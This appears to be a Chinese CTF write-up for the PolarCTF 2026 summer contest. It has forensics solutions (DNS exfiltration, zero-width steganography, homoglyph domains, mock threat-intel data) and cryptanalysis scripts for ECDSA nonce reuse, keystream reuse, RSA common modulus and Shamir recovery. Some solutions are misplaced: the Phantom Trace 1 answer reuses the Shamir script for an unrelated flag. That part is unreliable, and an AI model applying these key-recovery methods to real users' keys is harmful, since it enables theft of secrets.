polar夏季赛部分题目

PolarCTF网络安全202 6夏 季个人挑战赛

WRITE UP

|---------------|----------------|
| 参赛人员： | lllxxy |

|---------------------------------------------------|
| 本题思路如下： XXXXXXXXXXXXXX，如图所示： XXXXXXXXXXXXXX...... |

第一部分：MISC

1 -1 迷途数据流

|---------|
| 本题思路如下： |

1 -2 这 一个 记

|---------|
| 本题思路如下： |

1 -3 Phantom Trace

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 下载txt文件得到以下的信息 Phantom Trace 1 内容是有情报显示，报告作者在报告编号字段中隐藏了一条秘密消息。 请提取该隐藏消息，以全大写字母提交。Flag格式: flag{你提取到的全大写消息} 下载附件然后编写脚本 from itertools import combinations from math import gcd from sympy import Matrix shares = # 粘你的 shares def try_det_mod(points): """ 构造 6x6 矩阵： 1, x, x\^2, x\^3, x\^4, y det 一定是 p 的倍数（在理想情况下） """ M = \[\] for x, y in points: M.append(1, x, x\*\*2, x\*\*3, x\*\*4, y) return abs(int(Matrix(M).det())) def recover_p(shares): g = 0 cnt = 0 # 用更多组合增强稳定性 for comb in combinations(shares, 6): det = try_det_mod(comb) if det == 0: continue g = det if g == 0 else gcd(g, det) cnt += 1 if cnt > 30: break print("+ raw gcd:", g) for f in 2, 3, 5, 7, 11, 13, 17: while g % f == 0: g //= f return g p = recover_p(shares) print("+ candidate p:", p) print("+ bit length:", p.bit_length()) from Crypto.Util.number import long_to_bytes # ========================= # 已知 prime p # ========================= p = 24311210375776326281883328971888384571190348544937819934107768024324957052873457462020928159962325094070750863794240977882920383930006938974055238384664853 # ========================= # shares (11个点) # ========================= shares = (13825276559652663759456053593154923232020771238254924190105602129554442740903032538098062820337983638666056784818726026705226866679025611690838448584570200, 19012813120561778249910002377121545519300396863416796577430580565668955435109529853661026703963191587511794739652897381447200605465672082042748885989744402), (14989248861487876756545923532577464423717630626792629221618966203158382671849012765703938440292173459828333463382287156647477649833759229415415422006446622, 1656433892597578744823177014342869528132831200379451998967521640131825487494819099422022469838825418150730143438520616267294835254347450196350209174872775), (19193170771688324398963345493388616208257949680877900104979298799760166459827906171423469189582755008620842357080263827095038929588780308148621589260541422, 11420248910634302383712371357580971808319584342845033562709305079257609558334879243688210930475525301635690020652329269939235513202907874912193579010147639), (18777091659417137576603135959549361738394745875776533930983699353415679891339311594674388484175296875080132898946694787449577170540182756514019328107408039, 9704588552249224055741700389530593621449542838333557625043239604844884216427066269916242710825967541084869521646880935759182920024727659925664328119325004), (14287513785577058854224398359692453526128916947865468956393138998889401907577994975977127911557142483281724809006107854288358113197720626510491043303548938, 9770438332979961381243902918934813992264072842817997713173849346168822219848231350591767294014602573834792519783840064045899272301954841421098105680418195), (15119386315728257486056813314318552552131776852359374571135536516700837163067296684378970563219592314591010021093834609706121742207654051417055052071557349, 16692084219568517724580051441903204713362782163474624605007356230785148566081431738623045160758806438045544385291581669748734947320653414449300238328109834), (21639299360306429790518264840030705977452919783601050938080982219887611170051387045460766025557892361751023229841353839566899377685975938928635556686547189, 12343877060822660195641885868676444926185745514478427502000391547786522673431926278446194312565987755951555714259193644278522945366156482829701926440766436), (17403781572025005208843063451017304109237698250797299652792725200086960681154790951373046337507380799261125197889969541906772099793896620488753295096504560, 19150670008423170996379784798328231445600406963296913739761096531018281916219407400122538102243817197525100016408303024079773707274831692716031708315774805), (13712268494862445248911494067355982992182490419234876397649838374491191895372155289722641937870164145755937780023138602530807219076237280105050726711219910, 1791011308314909339397751948386556426199638075952445414959762706679206743326931052440210268620207102528545976021104436487643745311936337923164621066436060), (21991384930267151269802069003579123930799446461196461214557072106672776944086736799413877206434356469442093165424509519266137102480781842658606739163403874, 14963223947878308999984311524851337448763815509922889823520921933718980739751743032849959416282177018557805255468910634606302831448277324417065732420585144), (20641737678873745759238644473878987874377780512320373213801366359879139450580105650792376384552918292291784843752265971609206700166575172878621369499660576, 21115775840010891534972527491920868611647594882864057129786366769672854596717667891296204137876321305451520048412806215332780594549883808548319082816815511) # ========================= # Lagrange 插值（求 f(0)） # ========================= def lagrange_at_zero(points, p): secret = 0 k = len(points) for i in range(k): xi, yi = pointsi num, den = 1, 1 for j in range(k): if i == j: continue xj = pointsj0 num = (num * (-xj)) % p den = (den * (xi - xj)) % p inv_den = pow(den, -1, p) li = num * inv_den % p secret = (secret + yi * li) % p return secret # ========================= # 恢复 secret # ========================= secret_int = lagrange_at_zero(shares:5, p) flag = long_to_bytes(secret_int) print("+ secret int:", secret_int) print("+ flag:", flag.decode()) 得到Phantom Trace 1的flag:flag{FALSEREPORT} Phantom Trace 2 附件第5节"分析师备注"共有7条备注。仔细观察每条备注的行尾------那里藏着一位内部人员的身份标识。 请解码该7字符的英文单词并提交。Flag格式: flag{全大写单词} 隐藏信息位于"报告编号"字段后面的零宽字符（Unicode U+200B 与 U+200C）中。 解码方法： U+200B（零宽空格） → 0 U+200C（零宽非连接符） → 1 按 8 位一组转换为 ASCII 得到二进制： 01000110 01000001 01001100 01010011 01000101 01010010 01000101 01010000 01001111 01010010 01010100 对应 ASCII： F A L S E R E P O R T 因此隐藏消息（按题目要求全大写提交）为： FALSEREPORT 最后第二个flag是flag{INSIDER} Phantom Trace 3 附件IOC清单中列出了若干域名。其中有一个域名使用了同形异码字符（Homoglyph）------它看起来和另一个域名完全一样，但使用了来自不同字母表的字符。 请找出该同形异码字符的 Unicode 码点（Code Point），格式为 `U+XXXX`（4位十六进制，大写）。Flag格式: flag{U+XXXX} IOC 清单中的第 1 和第 3 个域名表面上相同，但其中第 3 个域名里的字母 e 实际是西里尔字母 е（U+0435），而不是拉丁字母 e（U+0065）。 因此，被用于同形异码攻击的 Unicode 码点是：Flag：flag{U+0435} Phantom Trace 4 附件第2节列出了本次攻击的 MITRE ATT&CK 技术映射表。但表中有一个技术ID被故意写错------它对应的战术描述与实际技术编号不匹配。 请查阅 MITRE ATT&CK 官方框架，找出该错误的技术ID，并写出正确的技术ID。Flag格式: flag{正确的技术ID}（例如: flag{T1234.567}） 鱼叉式钓鱼附件（Spearphishing Attachment） 该技术属于 TA0001 - 初始访问（Initial Access） 战术。T1566.001 的技术定义是：攻击者发送带有恶意附件的鱼叉式钓鱼邮件，诱使目标打开附件以执行恶意代码或利用漏洞 最后得到flag：flag{T1566.001} Phantom Trace 5 综合附件中的所有线索------包括隐藏消息、同形异码域名、ATT&CK 错误、伪旗标识------回答以下问题： 5a. 这份威胁情报报告本身最可能是以下哪种情况？ - A) 一份真实的 APT 攻击分析报告 - B) 红队/渗透测试的事后伪装报告 - C) 某厂商为营销目的编造的报告 - D) 攻击者故意散布的虚假情报（反溯源/情报污染） 5b. 请用一个英文单词概括支撑你 5a 判断的最关键证据（从隐藏信息或数据异常中提炼）。 5c. 附件中提到的三个差异点里，哪一个最可能是攻击方故意植入的反溯源伪旗？请写出附件中该差异点的原文关键特征词。Flag格式: flag{选项字母_关键证据词_伪旗特征词} |

1 -4 FalseSight

|---------|
| 本题思路如下： |

1 -5 DNS 隐信道

|------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 安全团队在例行审计时，捕获到内网主机 192.168.10.55 的一段异常流量。 怀疑该主机已被植入木马，正在通过 DNS 协议 向外隐蔽传输敏感数据。 请分析流量包，还原被窃取的数据内容，获取 Flag。 最后得到flag flag{dns_exf1l_tr4ff1c_4n4lys1s} |

1-6 静默追踪

|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 完整解题思路总结： 1. 关键提示解读 "信息并不在文件里，而在文件的关系中" → 需要组合多个碎片文件 "碎片的重量决定步伐" → 文件大小决定重组顺序和方式 1. 分析过程 Step 1: 识别 ZIP 文件头 frame_03.bin 开头是 50 4B 03 04 (PK..) → ZIP 本地文件头 从 ZIP 头解析：文件名长度 9 字节，文件内容长度 45 字节 Step 2: 重组文件名 ZIP 头中文件名开头是 fi frame_01.bin 开头是 nal.txt 拼接得到：fi + nal.txt = final.txt Step 3: 重组文件内容 ZIP 头显示内容长度为 45 字节 frame_01.bin 去掉 nal.txt 后剩余 25 字节 frame_05.bin 前 20 字节补全 完整内容：==QfmJneuV2cfNHMfFmY2dmb5JXZfdWYylndmtHdul3c Step 4: Base64 解码 反转字符串：c3ludHtmdnlyYWdfZXJ5bmd2YmFfMHNfc2VuenJmfQ== Base64 解码：synt{fvyrag_eryngvba_0f_senzrf} Step 5: ROT13 解码 synt → flag fvyrag → silent eryngvba → relation 0f → 0f senzrf → frames 3. 最终 Flag flag{silent_relation_0f_frames} |

1- 7 碎影坐标码踪

|---------|
| 本题思路如下： |

1-8 miscwei

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 打开这个网址 {"data":{"C2 地址":"111.229.26.3:51982","VT 检出率":"42/72","关联组织":"DarkLynx (APT)","备注":"该家族通常配合 CobaltStrike Beacon 使用","家族":"DarkLynx Downloader","文件名":"salary_report_2024.xlsm","类型":"VBA Macro Loader","首次上传":"2024-06-10"},"query":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","status":"found"} 最后的信息收集： {"data":{"MITRE ATT&CK":{"C2":"T1071.001 (Web 协议)","凭据窃取":"T1003.001 (LSASS Dump)","初始访问":"T1566.001 (鱼叉钓鱼附件)","执行":"T1204.002 (恶意宏)","持久化":"T1547.001 (注册表 Run 键)","提权":"CVE-2024-0610","数据外传":"T1041 (C2 信道)"},"别名":"DLNX","ATK-47","动机":"网络间谍 / 知识产权窃取","已知漏洞":"CVE-2024-0610 (权限提升)","CVE-2023-23397 (Outlook NTLM 泄露)","常用工具":"CobaltStrike Beacon","Mimikatz","PoisonIvy 变种","活跃区域":"亚太地区","特征":"惯用非标准端口、伪装 Windows Update 通信、鱼叉钓鱼投放 XLSM","组织全称":"DarkLynx (暗夜山猫)"},"query":"DarkLynx","status":"found"}{"data":{"Beacon 模式":"异步回调","C2 协议":"HTTP/HTTPS Malleable C2","关联组织":"DarkLynx, APT29, FIN7 等","类型":"商业渗透测试框架（被恶意使用）","默认端口":"50050 (TeamServer)"},"query":"CobaltStrike","status":"found"}{"data":{"关联组织":"DarkLynx","协议":"HTTP","备注":"非标准端口，用于绕过 IDS 检测","工具":"CobaltStrike Malleable C2","服务":"C2 Beacon 监听端口"},"query":"51982","status":"found"} 得到flag：flag{DarkLynx_CobaltStrike_CVE-2024-0610} |

第二部分：CRYPTO

2 -1 签到

|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 你在一个程序员的电脑里发现了一个名为 'flag.txt' 的文件，里面只有一串神秘数字： 密文： 102 108 97 103 123 112 111 108 97 114 99 116 102 125 提示 计算机的世界里，只有 0 和 1。 题目是2进制转化成10进制（十进制表示的 ASCII 码。） flag{polarctf} |

2 -2 一封情书

|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 解压文件得到 然后私钥已通过相同 nonce k 的 ECDSA 签名恢复（使用 SHA-256 哈希、secp256k1 参数）。计算过程： 1. 计算 h1 = SHA256("I love you, Li!")、h2 = SHA256("Will you be my girlfriend?") 2. k = (h1 - h2) * inv(s1 - s2) mod n 3. d = (s1 * k - h1) * inv(r) mod n 脚本如下： import hashlib # secp256k1 参数 n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 # 已知数据 r = 0x2a4c6e8f0a2b4c6d8e0f2a4c6e8f0a2b4c6d8e0f2a4c6e8f0a2b4c6d8e0f2a4c s1 = 0x4c2e1a3b5d7f9e8c6a4b2d1e3f5a7c9b8e6d4f2a1c3e5b7d9f0a2c4e6f8a0b2c s2 = 0x9a8c6e4d2b0f1e3c5a7b9d8e6f4a2c0d1e3f5a7b9c8d6e4f2a0b1c3d5e7f9a8b msg1 = "I love you, Li!" msg2 = "Will you be my girlfriend?" # 计算消息哈希 h1 = int(hashlib.sha256(msg1.encode('utf-8')).hexdigest(), 16) h2 = int(hashlib.sha256(msg2.encode('utf-8')).hexdigest(), 16) print(f"h1: {hex(h1)}") print(f"h2: {hex(h2)}") # 模逆元函数 def mod_inverse(a, m): return pow(a, -1, m) # 恢复随机数 k k = ((h1 - h2) * mod_inverse(s1 - s2, n)) % n print(f"k: {hex(k)}") # 恢复私钥 d d = ((s1 * k - h1) * mod_inverse(r, n)) % n print(f"私钥 d: {hex(d)}") # 输出 flag print(f"flag{{{hex(d)2:}}}") 最后得到 flag{734fc83fb33713821e4c3bc3b7c2968d585ec299976e4a19bb94feaa072e0a52} |

2-3 XOR流密码密钥重用

|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 这道题目利用了重复密钥异或流密码的弱点： 当同一密钥流被用于加密两条不同的密文时，攻击者如果知道其中一条明文，就能通过 已知明文 ⊕ 密文1 = 密钥流 恢复出密钥，然后直接解密密文2。 题目中密钥长度是 16 字节，且重复使用（没有随机 nonce/IV），这正是你计算出的 b'P\xac@\\x86\\xaf\\xa30\\xdat\\x12\\xae/6\\xba\\xc6'。 你提到的已知明文片段 "The quick brown fox..." 大约 74 字节，足够覆盖 16 字节密钥的完整周期（实际几个周期后即可验证密钥模式）。 然后用该密钥扩展至密文2的长度（44 字节）并异或，即可得到 flag。 脚本 # XOR Stream Cipher 密钥重用攻击脚本 # 利用已知明文恢复密钥流，然后解密 Flag ct1_hex = "04c4257bf7daca53b15470dc4041d4e636c3387becdace40a9547dd84a449ab238c96037e7d5da10be1b75800f62d2af238c303ae8c8d151b75471c14142dbaf3edf603ef0cad149fa1877da5b53c8e63fca602feeca8375b4137ec75c5e9aa73cdc283ae4cad710bb0032c24a57c9b270c32e38e3818379ae547bdd0f55d5ab3dc32e37ff8fd643bf1032c840449ab235df3432e8c88344a30477d95d5fcea322df603ae8cb8353b51962db5b53c8e63bc93939e9ced154a95832cf41529aa03fde603fefdcd35cbb0d7bc04816dfbe31c13037e3dc835fbc5474c14142c9e870f8283ea6cac242b61d77dd5b16d1a83fdb2e7be7dfd355bb0673c04c539aa9368c3433efdc8340b20673dd4a16d3b570ca3234eb8fd758bf547ecf5b539aa839c2252fe3cacd44b25471cb4142cfb429826016e7c1da10aa117dde43539aae31da257bf3dcc654fa007ac75c16c9a33ed82535e5ca8344b55462dc4e55ceaf33c9602feecaca42fa1c73c04b41c8af24c52e3ca6dcc859b6186180" ct2_hex = "36c0213cfdd79342850621db5c53e5ab64c72528d9dcd742e9157ff14c07caae63de1f6ae8dcc653af0677d3" # 转换为字节 ct1 = bytes.fromhex(ct1_hex) ct2 = bytes.fromhex(ct2_hex) # 已知明文（长度必须为 380 字节） known_plaintext = b"The quick brown fox jumps over the lazy dog. " \* 8 + b"This is a classic pangram used in cryptography challenges to demonstrate stream cipher key reuse vulnerabilities." # 确保长度正确 known_plaintext = known_plaintext\[:380 assert len(known_plaintext) == 380 # 恢复前 380 字节的密钥流（实际是 16 字节重复密钥） keystream = bytes(a ^ b for a, b in zip(known_plaintext, ct1)) # 提取 16 字节密钥（重复模式） key = keystream:16 print("恢复的密钥 (16 bytes):", key) # 生成 Flag 所需的密钥流 keystream_for_flag = (key * (len(ct2) // len(key) + 2)):len(ct2) # 解密 Flag flag = bytes(a ^ b for a, b in zip(keystream_for_flag, ct2)) print("Flag:", flag.decode('utf-8')) flag 为：flag{x0r_r3use_m4kes_str3am_c1ph3r_1nsecure} |

2 -4 RC4

|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 解压文件然后得到思路 这两个密文使用了同一个 RC4 密钥流（标准的 KSA + PRGA）进行加密。 c1 ^ c2 的结果直接就是 p1 ^ p2。 如果猜测其中一个明文是 "this_is_the_key!"（由所提供的密钥字符串经过解码和凯撒移位得到），那么通过异或就能立刻得到另一个明文，也就是 flag。 题目中的改动只是"混淆过的密钥"的呈现方式，RC4 的核心算法依然是标准实现。 根据脚本 #!/usr/bin/env python3 # RC4 双密文异或攻击脚本 # 已知：c1 = p1 ^ ks, c2 = p2 ^ ks, 所以 p2 = p1 ^ (c1 ^ c2) # 猜测 p1 = "this_is_the_key!" 得到 p2 即为 flag def main(): # 密文（十六进制字符串） c1_hex = "63dc968e6fbd78425b1aa80deca5dddd5bc2773d4c11bf3a" c2_hex = "71d89e9a4b8648297043be0de9f0d0a328f228557863db47" # 转换为字节 c1 = bytes.fromhex(c1_hex) c2 = bytes.fromhex(c2_hex) print(f"c1 长度: {len(c1)} 字节") print(f"c2 长度: {len(c2)} 字节") # 猜测的明文 p1 p1_guess = b"this_is_the_key!" print(f"猜测 p1: {p1_guess}") print(f"p1 长度: {len(p1_guess)} 字节") # 计算 c1 ^ c2 xor_length = min(len(c1), len(c2)) c1_xor_c2 = bytes(c1i ^ c2i for i in range(xor_length)) # 计算 p2 = p1 ^ (c1 ^ c2) min_len = min(len(p1_guess), xor_length) p2 = bytes(p1_guessi ^ c1_xor_c2i for i in range(min_len)) print(f"\n解密出的 p2 前 {min_len} 字节: {p2}") print(f"ASCII 形式: {p2.decode('ascii', errors='ignore')}") # 如果 p2 长度小于密文，可以继续用 keystream 恢复剩余部分 if len(c1) > len(p1_guess): # 从已知部分恢复 keystream ks = bytes(c1i ^ p1_guessi for i in range(len(p1_guess))) # 解密剩余字节 remaining = bytes(c2i ^ ksi % len(ks) for i in range(len(p1_guess), len(c2))) print(f"\n剩余部分解密: {remaining}") # 拼接完整 p2 full_p2 = p2 + remaining print(f"\n完整 p2: {full_p2}") print(f"完整 flag: {full_p2.decode('ascii', errors='ignore')}") # 验证 key 的处理（可选） key_hex = "64327473646C3973646C393361326866626D686949513D3D" key_bytes = bytes.fromhex(key_hex) print(f"\n原始 key 十六进制: {key_hex}") print(f"Key 解码 (尝试1 - 直接ASCII): {key_bytes.decode('ascii', errors='ignore')}") # Base64 解码尝试 import base64 try: key_b64_str = key_bytes.decode('ascii') real_key = base64.b64decode(key_b64_str) print(f"Key Base64 解码: {real_key.hex()} -> {real_key}") print(f"Key 长度: {len(real_key)} 字节 (符合 ≤16)") except: print("Base64 解码失败") if name == "main": main() 得到flag{RC4_1s_n0t_s0_h4rd} |

2-5 RSA攻击

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 解压文件得到 利用相同模数不同公钥指数 + gcd(e1,e2)=1 的 common modulus attack 直接恢复明文。 脚本如下： n = 13812575233672721831586447583537566876653330486388935409787324333890787459392340450466602667504564680439365520897560873428017286096972445000317824251067352767983648512628776119679123400768824503694790917456261015793839979622036029611045745581363369351857864086686963496317673425630514828633413586909763949795187270764002509197362846908721600263590407640239331435797743946639068968182530714992497969629250766233642006666869043197198488505558710080081572718303651084249757629984467851536523131561671672489611342354506102975683280634931335250787164325776630303410430197355308594589794345127372612129749874742848505962957 c1 = 6070418361005764781666022160782201020887766530217726892023574250703991153557153150240365562631823866925399109653692772429273414466157925616984969604480345833056708745589264326707421262501098443511684348192232914773363078866001499635599832817468918612502325969087574855976873314002597693535529314223131401211725375960723298442955172141723469659923837266222074788068850377594521429498262678342651354197024627444164288711810799491130391148471163552225195175015155522706829274469375372001014646432745594081482121724200720169564704735134585990761451469788279800252372582853001296020279841151437121368396563208194238176809 c2 = 10333074300444651393936782269258556921403986428158959194325049613051485082847482400799333224207225002899420584885380779122331681690914097226669296406031455480685880093806047826997202684091610029196843015145312932541842991056212933838748027848354582851989374719190041121737024050736144878626494196879779470357938007923163393755461501521926143809013879106438359634585413111911930506853827052788328813877660360961030885521473428344868672139024952576892377942170827101770540081503574982983989347495232393714702165354007286096839200607023742050117961927827236261835001175781713994427455900056065253089202845028635992697862 def mod_inverse(a, m): m0, x0, x1 = m, 0, 1 if m == 1: return 0 while a > 1: q = a // m m, a = a % m, m x0, x1 = x1 - q * x0, x0 if x1 < 0: x1 += m0 return x1 # e1 = 65537, e2 = 17 # 65537 * (-8) + 17 * 30841 = 1 c1_8 = pow(c1, 8, n) inv_c1_8 = mod_inverse(c1_8, n) c2_pow = pow(c2, 30841, n) m = (c2_pow * inv_c1_8) % n flag = m.to_bytes((m.bit_length() + 7) // 8, 'big') print(flag) 最后得到flag：flag{c0mm0n_m0dulus_1s_d4ng3r0us} |

2-6 Shamir

|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本题思路如下： 解压得到 思路： 这是一个 Shamir 秘密共享 (Shamir's Secret Sharing) 方案，参数为 (k=5, n=11)，秘密是 flag（转成长整数）。 题目中 p（大素数）被隐藏了，我们需要先找回 p，然后用任意 5 个分片通过拉格朗日插值法恢复秘密（常数项）。 脚本： from Crypto.Util.number import long_to_bytes import itertools # 已找回的素数 p p = 24311210375776326281883328971888384571190348544937819934107768024324957052873457462020928159962325094070750863794240977882920383930006938974055238384664853 # 11 个分片 (x, y) shares = (13825276559652663759456053593154923232020771238254924190105602129554442740903032538098062820337983638666056784818726026705226866679025611690838448584570200, 19012813120561778249910002377121545519300396863416796577430580565668955435109529853661026703963191587511794739652897381447200605465672082042748885989744402), (14989248861487876756545923532577464423717630626792629221618966203158382671849012765703938440292173459828333463382287156647477649833759229415415422006446622, 1656433892597578744823177014342869528132831200379451998967521640131825487494819099422022469838825418150730143438520616267294835254347450196350209174872775), (19193170771688324398963345493388616208257949680877900104979298799760166459827906171423469189582755008620842357080263827095038929588780308148621589260541422, 11420248910634302383712371357580971808319584342845033562709305079257609558334879243688210930475525301635690020652329269939235513202907874912193579010147639), (18777091659417137576603135959549361738394745875776533930983699353415679891339311594674388484175296875080132898946694787449577170540182756514019328107408039, 9704588552249224055741700389530593621449542838333557625043239604844884216427066269916242710825967541084869521646880935759182920024727659925664328119325004), (14287513785577058854224398359692453526128916947865468956393138998889401907577994975977127911557142483281724809006107854288358113197720626510491043303548938, 9770438332979961381243902918934813992264072842817997713173849346168822219848231350591767294014602573834792519783840064045899272301954841421098105680418195), (15119386315728257486056813314318552552131776852359374571135536516700837163067296684378970563219592314591010021093834609706121742207654051417055052071557349, 16692084219568517724580051441903204713362782163474624605007356230785148566081431738623045160758806438045544385291581669748734947320653414449300238328109834), (21639299360306429790518264840030705977452919783601050938080982219887611170051387045460766025557892361751023229841353839566899377685975938928635556686547189, 12343877060822660195641885868676444926185745514478427502000391547786522673431926278446194312565987755982555714259193644278522945366156482829701926440766436), (17403781572025005208843063451017304109237698250797299652792725200086960681154790951373046337507380799261125197889969541906772099793896620488753295096504560, 19150670008423170996379784798328231445600406963296913739761096531018281916219407400122538102243817197525100016408303024079773707274831692716031708315774805), (13712268494862445248911494067355982992182490419234876397649838374491191895372155289722641937870164145755937780023138602530807219076237280105050726711219910, 1791011308314909339397751948386556426199638075952445414959762706679206743326931052440210268620207102528545976021104436487643745311936337923164621066436060), (21991384930267151269802069003579123930799446461196461214557072106672776944086736799413877206434356469442093165424509519266137102480781842658606739163403874, 14963223947878308999984311524851337448763815509922889823520921933718980739751743032849959416282177018557805255468910634606302831448277324417065732420585144), (20641737678873745759238644473878987874377780512320373213801366359879139450580105650792376384552918292291784843752265971609206700166575172878621369499660576, 21115775840010891534972527491920868611647594882864057129786366769672854596717667891296204137876321305451520048412806215332780594549883808548319082816815511) def mod_inverse(a, m): """扩展欧几里得求模逆""" def egcd(a, b): if a == 0: return b, 0, 1 g, y, x = egcd(b % a, a) return g, x - (b // a) * y, y g, x, y = egcd(a, m) 